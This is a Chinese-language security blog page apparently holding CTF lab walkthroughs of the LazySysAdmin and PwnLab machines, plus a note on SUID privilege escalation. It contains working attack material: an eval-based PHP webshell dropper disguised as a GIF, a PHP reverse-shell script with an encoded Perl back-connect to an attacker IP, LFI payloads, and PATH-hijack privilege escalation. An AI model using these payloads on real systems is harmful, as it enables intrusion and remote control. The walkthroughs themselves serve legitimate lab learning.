HexBlog

0%

发表于 更新于 分类于

提权相关

查看系统上运行的所有SUID可执行文件

1
2
3
$ find / -user root -perm -4000 -print 2>/dev/null
$ find / -perm -u=s -type f 2>/dev/null
$ find / -user root -perm -4000 -exec ls -ldb {} \;

以上所有二进制文件都将以root用户权限执行,因为它们的权限中包含"s",并且对应的是root权限。

如果Find命令也是以Suid权限运行的话,则将通过find执行的所有命令都会以root权限执行。

1
2
$ touch pentestlab
$ find pentestlab -exec whoami \;
大部分Linux操作系统都安装了netcat,因此也可以被利用来将权限提升至root。
阅读全文 »

发表于 更新于 分类于

先看看网站源代码 找到图片存放的位置,看到一个特殊文件名,base64解密

1
2
AAEAAQAAAAAAAAdJAAAAJDhiNGY1YTk3LTQ3NTctNDE1Ny1hZmU4LTlhMWE4
I$8b4f5a97-4757-4157-afe8-9a1a8

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
# divint3 @ Divint3 in ~ [21:49:41] C:130
$ nmap 172.17.135.63 -sV -Pn

Starting Nmap 7.40 ( https://nmap.org ) at 2019-05-27 21:53 CST
Nmap scan report for 172.17.135.63
Host is up (0.020s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.79 seconds

# divint3 @ Divint3 in ~ [21:53:15] 
$ nmap 172.17.135.63 -sV -Pn -A

Starting Nmap 7.40 ( https://nmap.org ) at 2019-05-27 21:53 CST
Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.87% done; ETC: 21:54 (0:00:00 remaining)
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.87% done; ETC: 21:54 (0:00:00 remaining)
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.87% done; ETC: 21:54 (0:00:00 remaining)
Nmap scan report for 172.17.135.63
Host is up (0.015s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|_  256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries 
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info: 
|   server: Admin.local
|   users: 1.0
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host: 10.160.110.191
|_  error: Closing link: (nmap@10.160.110.191) [Client exited]
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 40m48s, deviation: 0s, median: 40m48s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN\x00
|   Domain name: \x00
|   FQDN: lazysysadmin
|_  System time: 2019-05-28T00:34:48+10:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.90 seconds

祭出dirb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28



-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon May 27 21:38:27 2019
URL_BASE: http://172.17.135.63/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://172.17.135.63/ ----
==> DIRECTORY: http://172.17.135.63/apache/                                                                                                                                                    
+ http://172.17.135.63/index.html (CODE:200|SIZE:36072)                                                                                                                                        
+ http://172.17.135.63/info.php (CODE:200|SIZE:77255)                                                                                                                                          
==> DIRECTORY: http://172.17.135.63/javascript/                                                                                                                                                
==> DIRECTORY: http://172.17.135.63/old/                                                                                                                                                       
==> DIRECTORY: http://172.17.135.63/phpmyadmin/                                                                                                                                                
+ http://172.17.135.63/robots.txt (CODE:200|SIZE:92)                                                                                                                                           
+ http://172.17.135.63/server-status (CODE:403|SIZE:293)                                                                                                                                       
==> DIRECTORY: http://172.17.135.63/test/                                                                                                                                                      
==> DIRECTORY: http://172.17.135.63/wordpress/                                                                                                                                                 
==> DIRECTORY: http://172.17.135.63/wp/

匿名访问smb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
# divint3 @ Divint3 in ~ [22:46:26] 
$ smbclient -L 172.17.135.63    
WARNING: The "syslog" option is deprecated
Enter divint3's password: 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        share$          Disk      Sumshare
        IPC$            IPC       IPC Service (Web server)
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

        Server               Comment
        ---------            -------
        DESKTOP-IN4T2GV      
        LAZYSYSADMIN         Web server

        Workgroup            Master
        ---------            -------
        WORKGROUP            DESKTOP-IN4T2GV


# divint3 @ Divint3 in ~ [22:20:32] 
$ smbclient //172.17.135.63/share$

WARNING: The "syslog" option is deprecated
Enter divint3's password: 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \> ls
  .                                   D        0  Tue Aug 15 19:05:52 2017
  ..                                  D        0  Mon Aug 14 20:34:47 2017
  wordpress                           D        0  Tue Aug 15 19:21:08 2017
  Backnode_files                      D        0  Mon Aug 14 20:08:26 2017
  wp                                  D        0  Tue Aug 15 18:51:23 2017
  deets.txt                           N      139  Mon Aug 14 20:20:05 2017
  robots.txt                          N       92  Mon Aug 14 20:36:14 2017
  todolist.txt                        N       79  Mon Aug 14 20:39:56 2017
  apache                              D        0  Mon Aug 14 20:35:19 2017
  index.html                          N    36072  Sun Aug  6 13:02:15 2017
  info.php                            N       20  Tue Aug 15 18:55:19 2017
  test                                D        0  Mon Aug 14 20:35:10 2017
  old                                 D        0  Mon Aug 14 20:35:13 2017

                3029776 blocks of size 1024. 1237820 blocks available
smb: \> get todolist.txt 
getting file \todolist.txt of size 79 as todolist.txt (8.6 KiloBytes/sec) (average 8.6 KiloBytes/sec)
smb: \> get deets.txt 
getting file \deets.txt of size 139 as deets.txt (5.0 KiloBytes/sec) (average 5.9 KiloBytes/sec)
smb: \> 
smb: \> cd wordpress
smb: \wordpress\> ls
  .                                   D        0  Tue Aug 15 19:21:08 2017
  ..                                  D        0  Tue Aug 15 19:05:52 2017
  wp-config-sample.php                N     2853  Wed Dec 16 17:58:26 2015
  wp-trackback.php                    N     4513  Sat Oct 15 03:39:28 2016
  wp-admin                            D        0  Thu Aug  3 05:02:02 2017
  wp-settings.php                     N    16200  Fri Apr  7 02:01:42 2017
  wp-blog-header.php                  N      364  Sat Dec 19 19:20:28 2015
  index.php                           N      418  Wed Sep 25 08:18:11 2013
  wp-cron.php                         N     3286  Mon May 25 01:26:25 2015
  wp-links-opml.php                   N     2422  Mon Nov 21 10:46:30 2016
  readme.html                         N     7413  Mon Dec 12 16:01:39 2016
  wp-signup.php                       N    29924  Tue Jan 24 19:08:42 2017
  wp-content                          D        0  Mon Aug 21 18:07:27 2017
  license.txt                         N    19935  Tue Jan  3 01:58:42 2017
  wp-mail.php                         N     8048  Wed Jan 11 13:13:43 2017
  wp-activate.php                     N     5447  Wed Sep 28 05:36:28 2016
  .htaccess                           H       35  Tue Aug 15 19:40:13 2017
  xmlrpc.php                          N     3065  Thu Sep  1 00:31:29 2016
  wp-login.php                        N    34327  Sat May 13 01:12:46 2017
  wp-load.php                         N     3301  Tue Oct 25 11:15:30 2016
  wp-comments-post.php                N     1627  Mon Aug 29 20:00:32 2016
  wp-config.php                       N     3703  Mon Aug 21 17:25:14 2017
  wp-includes                         D        0  Thu Aug  3 05:02:03 2017

                3029776 blocks of size 1024. 1237744 blocks available
smb: \wordpress\> get wp-config.php 
getting file \wordpress\wp-config.php of size 3703 as wp-config.php (452.0 KiloBytes/sec) (average 452.0 KiloBytes/sec)
smb: \wordpress\>

deets.txt
1
2
3
4
5
6
7
CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345


todolist.txt

1
Prevent users from being able to view to web root using the local file browser

wp-config.php的内容包含数据库配置,故下载

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */

define('AUTH_KEY',         'SAq-)W,-K9tFcW(=?ro4SJ5)R.mx%+@KL-I@PB{<-i>g3n^1|E<-uN|}F;:PbMYJ');
define('SECURE_AUTH_KEY',  'u .o%Ld%m27waNqK+*`~&j6~v!d7vI|OwA|hd8%r#ri_`WRIcCN-KiTSWmk)1;xG');
define('LOGGED_IN_KEY',    'iX^NN~N7R5Mdmeh:$iLY60r~K[)^f5vk`wGDO30r8Ns)gA17FRt2|$#S!Lq@-<|`');
define('NONCE_KEY',        ',_xAk=+)B7f_a|#J44}qWca!=`s4{C2.Xe>sY%4Ybd5*3z9WRH-ysm=.|Gm^McvU');
define('AUTH_SALT',        '(:^<BWwzWYx ,f^9anxD,+V+2-&,VJ@@)U7CSzjv_MvD67>?05ihCG]Q1K:_7Xsa');
define('SECURE_AUTH_SALT', 'ud]}}0rWRMGZ+a`Hky G7|i|+c7YyH4=l#5{/1R=|]PYrOmN{&0JuqkO=o5vyGg5');
define('LOGGED_IN_SALT',   '=M_DRp%vGmijIhl%K!(v>:,*RR<cl9ahav%{q`&I/0HD/$W/LK:mxR37PKh?Zzi8');
define('NONCE_SALT',       'ABOgE>G:U;Q/hO^>jBG5e96OL6+{=mV,|2S~c,~dhVa!E/&Q[Mc8#IgVTuXAI}sY');

;

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/* Dynamic site URL added by Togie */
$currenthost = "http://".$_SERVER['HTTP_HOST'];
$currentpath = preg_replace('@/+$@','',dirname($_SERVER['SCRIPT_NAME']));
$currentpath = preg_replace('/\/wp.+/','',$currentpath);
define('WP_HOME',$currenthost.$currentpath);
define('WP_SITEURL',$currenthost.$currentpath);
define('WP_CONTENT_URL', $currenthost.$currentpath.'/wp-content');
define('WP_PLUGIN_URL', $currenthost.$currentpath.'/wp-content/plugins');
define('DOMAIN_CURRENT_SITE', $currenthost.$currentpath );
@define('ADMIN_COOKIE_PATH', './');


/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

访问http://172.17.135.63/wordpress/ 得到提示,my name is togie.

ssh链接ssh togie@172.17.135.63密码12345

1
2
togie@LazySysAdmin:~$ cd 
-rbash: cd: restricted
切换至bash

sudo -s提权到root

1
2
3
4
5
6
togie@LazySysAdmin:~$ sudo -s
[sudo] password for togie: 
root@LazySysAdmin:~# whoami
root
root@LazySysAdmin:~# id
uid=0(root) gid=0(root) groups=0(root)

root依然默认使用rbash切换到bash,但是从passwd中看是bash,但是就是不能用cd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
root@LazySysAdmin:/root# cat proof.txt 
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851


Well done :)

Hope you learn't a few things along the way.

Regards,

Togie Mcdogie




Enjoy some random strings

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu

发表于 更新于 分类于

靶场71

nmap扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ nmap 172.17.135.71 -sS -Pn -O

Starting Nmap 7.40 ( https://nmap.org ) at 2019-05-23 21:03 CST
Nmap scan report for 172.17.135.71
Host is up (0.0034s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
80/tcp   open  http
111/tcp  open  rpcbind
3306/tcp open  mysql
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 3 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.27 seconds

dirb扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
$ dirb http://172.17.135.71 ctf/dir/php.txt 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu May 23 21:12:43 2019
URL_BASE: http://172.17.135.71/
WORDLIST_FILES: ctf/dir/php.txt

-----------------

GENERATED WORDS: 3355                                                          

---- Scanning URL: http://172.17.135.71/ ----
+ http://172.17.135.71//index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../ (CODE:200|SIZE:332)                                                                          
+ http://172.17.135.71//index.php (CODE:200|SIZE:332)                                                                                                                                          
+ http://172.17.135.71//config.php (CODE:200|SIZE:0)                                                                                                                                           
+ http://172.17.135.71//login.php (CODE:200|SIZE:250)                                                                                                                                          
+ http://172.17.135.71//upload.php?action=upfile (CODE:200|SIZE:19)                                                                                                                            
+ http://172.17.135.71//upload.php (CODE:200|SIZE:19)                                                                                                                                          
+ http://172.17.135.71//upload/ (CODE:200|SIZE:4774)                                                                                                                                           
+ http://172.17.135.71//../admin (CODE:400|SIZE:305)                                                                                                                                           
+ http://172.17.135.71//../admin.php (CODE:400|SIZE:305)                                                                                                                                       
+ http://172.17.135.71//../admin/default (CODE:400|SIZE:305)                                                                                                                                   
+ http://172.17.135.71//../admin/default.php (CODE:400|SIZE:305)                                                                                                                               
+ http://172.17.135.71//../admin/index (CODE:400|SIZE:305)                                                                                                                                     
+ http://172.17.135.71//../admin/index.php (CODE:400|SIZE:305)                                                                                                                                 
+ http://172.17.135.71//../admin/login (CODE:400|SIZE:305)                                                                                                                                     
+ http://172.17.135.71//../admin/login.php (CODE:400|SIZE:305)                                                                                                                                 
+ http://172.17.135.71//../admin/manage (CODE:400|SIZE:305)                                                                                                                                    
+ http://172.17.135.71//../admin/manage.php (CODE:400|SIZE:305)                                                                                                                                

-----------------
END_TIME: Thu May 23 21:12:51 2019
DOWNLOADED: 3355 - FOUND: 17


$ dirb http://172.17.135.71 ctf/dir/dir.txt 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu May 23 21:13:38 2019
URL_BASE: http://172.17.135.71/
WORDLIST_FILES: ctf/dir/dir.txt

-----------------

GENERATED WORDS: 1170                                                          

---- Scanning URL: http://172.17.135.71/ ----
+ http://172.17.135.71//images/ (CODE:200|SIZE:942)                                                                                                                                            
+ http://172.17.135.71//upload (CODE:301|SIZE:315)                                                                                                                                             
+ http://172.17.135.71//images (CODE:301|SIZE:315)                                                                                                                                             

-----------------
END_TIME: Thu May 23 21:13:41 2019
DOWNLOADED: 1170 - FOUND: 3

可疑位置 http://172.17.135.71/index.php?page=login 这里指定了一个页面,尝试指定伪协议 伪协议学习https://lorexxar.cn/2016/09/14/php-wei/ http://172.17.135.71/index.php?page=php://filter/read=convert.base64-encode/resource=index.php 没有结果,因为上面使用的是页面名?page=login,所以使用php://filter/read=convert.base64-encode/resource=index

index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
	include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
if (isset($_GET['page']))
{
	include($_GET['page'].".php");
}
else
{
	echo "Use this server to upload and share image files inside the intranet";
}
?>
</center>
</body>
</html>

login

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);

if (isset($_POST['user']) and isset($_POST['pass']))
{
	$luser = $_POST['user'];
	$lpass = base64_encode($_POST['pass']);

	$stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
	$stmt->bind_param('ss', $luser, $lpass);

	$stmt->execute();
	$stmt->store_Result();

	if ($stmt->num_rows == 1)
	{
		$_SESSION['user'] = $luser;
		header('Location: ?page=upload');
	}
	else
	{
		echo "Login failed.";
	}
}
else
{
	?>
	<form action="" method="POST">
	<label>Username: </label><input id="user" type="test" name="user"><br />
	<label>Password: </label><input id="pass" type="password" name="pass"><br />
	<input type="submit" name="submit" value="Login">
	</form>
	<?php
}

config

1
2
3
4
5
6
<?php
$server	  = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>

upload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
<body>
<form action='' method='post' enctype='multipart/form-data'>
<input type='file' name='file' id='file' />
<input type='submit' name='submit' value='Upload'/>
</form>
</body>
</html>
<?php 
if(isset($_POST['submit'])) {
	if ($_FILES['file']['error'] <= 0) {
		$filename  = $_FILES['file']['name'];
		$filetype  = $_FILES['file']['type'];
		$uploaddir = 'upload/';
		$file_ext  = strrchr($filename, '.');
		$imageinfo = getimagesize($_FILES['file']['tmp_name']);
		$whitelist = array(".jpg",".jpeg",".gif",".png"); 

		if (!(in_array($file_ext, $whitelist))) {
			die('Not allowed extension, please upload images only.');
		}

		if(strpos($filetype,'image') === false) {
			die('Error 001');
		}

		if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
			die('Error 002');
		}

		if(substr_count($filetype, '/')>1){
			die('Error 003');
		}

		$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

		if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
			echo "<img src=\"".$uploadfile."\"><br />";
		} else {
			die('Error 4');
		}
	}
}

?>

接下来的思路就变成了登录mysql,把登录密码dump出来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
$ mysql -uroot -h 172.17.135.71 -p

Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 23929
Server version: 5.5.47-0+deb8u1 (Debian)

Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select * from users;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.00 sec)

kent JWzXuBJJNy
mike SIfdsTEn6I
kane iSv5Ym2GRo

登陆后 上传文件, 限制太严格,无法上传 审计代码后发现,

1
2
3
4
if (isset($_COOKIE['lang']))
{
	include("lang/".$_COOKIE['lang']);
}
参考资料

写一个用于写出木马文件的木马

1
2
3
4
5
6
GIF89a
<?php
$file=fopen("divint3.php","w");
$ma="<?php  @eval($_POST[divint3]); ?>";
fwrite($file, $ma);
fclose($file)

由于不知道木马写到哪里去了,失败了 使用小马 文件上传位置upload/068ae40523a24c9ef54edefd375e542d.gif 配置蚁剑 登陆成功,发现文件divint3.php,但是根目录下的divint3.php内容不是我定义的内容,存疑

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
find / -perm -u=s -type f 2>/dev/null

/bin/mount
/bin/su
/bin/umount
/sbin/mount.nfs
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/at
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/chsh
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4

1
2
3
lsb_release -a  	#发行版本
getconf GNU_LIBC_VERSION #glibc版本
glibc 2.19

使用pt_chown提权,无效

1
2
3
env
set
export

shell 反弹脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
 
$yourip = "10.160.108.146";
$yourport = "2333";
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");

先查看可用shell

1
2
3
4
5
6
(www-data:/var/www/html) $ cat /etc/shells
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash

在nologin中使用nc弹shell,反弹回来的是nologin,使用python -c "import pty;pty.spawn('/bin/rbash')"得到交互式shell

su 到kane iSv5Ym2GRo,登陆成功 得到假flagflag{T5566Y}

查看.bash_history

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
kane@pwnlab:~$ cat .bash_history
cat .bash_history
uid
id
ls
./222.sh
ls
cd /hmoe
cd /home
ls
cd /mike
cat mike
ls -al
cd ~
ls -al
echo '/bin/sh' >> 222.sh
chmod 777 222.sh
ls
./222.sh
echo `/bin/sh`
export PATH=./:$PATH
./msgike
ls -al
./msgmike
echo '/bin/sh' > cat
chmod 777 cat
ls
./msgmike

再次检查suid

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
kane@pwnlab:/home$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/su
/bin/umount
/sbin/mount.nfs
/home/kane/msgmike
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/at
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/chsh
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4

发现msgmike有suid

1
2
3
4
5
6
7
8
9
10
11
12
kane@pwnlab:~$ ls -la
ls -la
total 40
drwxr-x--- 2 kane kane 4096 May 26 03:19 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw------- 1 kane kane  244 Apr 25 09:53 .bash_history
-rw-r--r-- 1 kane kane  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 kane kane 3515 Mar 17  2016 .bashrc
-rwxrwxrwx 1 kane kane   10 May 21 09:56 cat
-rw-r--r-- 1 root root   13 Apr 25 10:32 flag_wrong.txt
